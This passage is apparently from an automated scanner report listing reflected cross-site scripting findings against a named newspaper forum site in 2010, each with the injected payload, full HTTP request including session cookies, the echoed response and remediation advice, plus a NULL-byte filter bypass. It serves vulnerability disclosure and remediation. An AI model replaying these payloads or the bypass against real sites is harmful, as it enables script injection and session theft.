The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4beb6"-alert(1)-"9c54b14f479 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/576?4beb6"-alert(1)-"9c54b14f479=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
!= 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forum/business-technology-business-news?4beb6"-alert(1)-"9c54b14f479=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.55. http://forums.mercurynews.com/forum/business-technology-business-news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/business-technology-business-news

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6416f"-alert(1)-"3bf608c035c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum6416f"-alert(1)-"3bf608c035c/business-technology-business-news HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:23 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forum6416f"-alert(1)-"3bf608c035c/business-technology-business-news";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVa
...[SNIP]...

3.56. http://forums.mercurynews.com/forum/business-technology-business-news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/business-technology-business-news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67461"-alert(1)-"eb6ddd1910a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/business-technology-business-news67461"-alert(1)-"eb6ddd1910a HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:32 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
!= 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forum/business-technology-business-news67461"-alert(1)-"eb6ddd1910a";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.57. http://forums.mercurynews.com/forum/business-technology-business-news [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/business-technology-business-news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 931e2"-alert(1)-"60a68e53a4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/business-technology-business-news?931e2"-alert(1)-"60a68e53a4e=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:10 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
!= 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forum/business-technology-business-news?931e2"-alert(1)-"60a68e53a4e=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.58. http://forums.mercurynews.com/forum/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/news

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7ec4"-alert(1)-"16924a4f316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forumf7ec4"-alert(1)-"16924a4f316/news HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:38 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forumf7ec4"-alert(1)-"16924a4f316/news";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=ge
...[SNIP]...

3.59. http://forums.mercurynews.com/forum/news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54941"-alert(1)-"d801b306391 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/news54941"-alert(1)-"d801b306391 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:44 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
ge="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forum/news54941"-alert(1)-"d801b306391";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.60. http://forums.mercurynews.com/forum/news [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forum/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9da1"-alert(1)-"992e5590b97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum/news?c9da1"-alert(1)-"992e5590b97=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:24 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
e="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forum/news?c9da1"-alert(1)-"992e5590b97=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.61. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/forum/602

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef319"-alert(1)-"7ea175d2fc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forumsef319"-alert(1)-"7ea175d2fc0/forum/602 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:21 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
nguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forumsef319"-alert(1)-"7ea175d2fc0/forum/602";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campai
...[SNIP]...

3.62. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/forum/602

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00ef166"-alert(1)-"5348053c353 was submitted in the REST URL parameter 2. This input was echoed as ef166"-alert(1)-"5348053c353 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/forum%00ef166"-alert(1)-"5348053c353/602 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
avaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/forum%00ef166"-alert(1)-"5348053c353/602";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=get
...[SNIP]...

3.63. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/forum/602

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0087dba"-alert(1)-"bd7fc6dfef5 was submitted in the REST URL parameter 3. This input was echoed as 87dba"-alert(1)-"bd7fc6dfef5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/forum/602%0087dba"-alert(1)-"bd7fc6dfef5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:39 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
cript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/forum/602%0087dba"-alert(1)-"bd7fc6dfef5";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.64. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/forum/673

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cac3"-alert(1)-"ff2a2ccfa6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forums8cac3"-alert(1)-"ff2a2ccfa6/forum/673 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 23:12:58 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=7cf2c41678eb464964f8a0ac1163697f; expires=Wed, 08 Dec 2010 02:46:18 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:13:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
nguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums8cac3"-alert(1)-"ff2a2ccfa6/forum/673";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campai
...[SNIP]...

3.65. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/forum/673

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00f1250"-alert(1)-"6cf71db7b96 was submitted in the REST URL parameter 2. This input was echoed as f1250"-alert(1)-"6cf71db7b96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/forum%00f1250"-alert(1)-"6cf71db7b96/673 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 23:13:32 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=ec6a4cd6b8b79036be9cc2544a3b80f1; expires=Wed, 08 Dec 2010 02:46:52 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:13:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21992

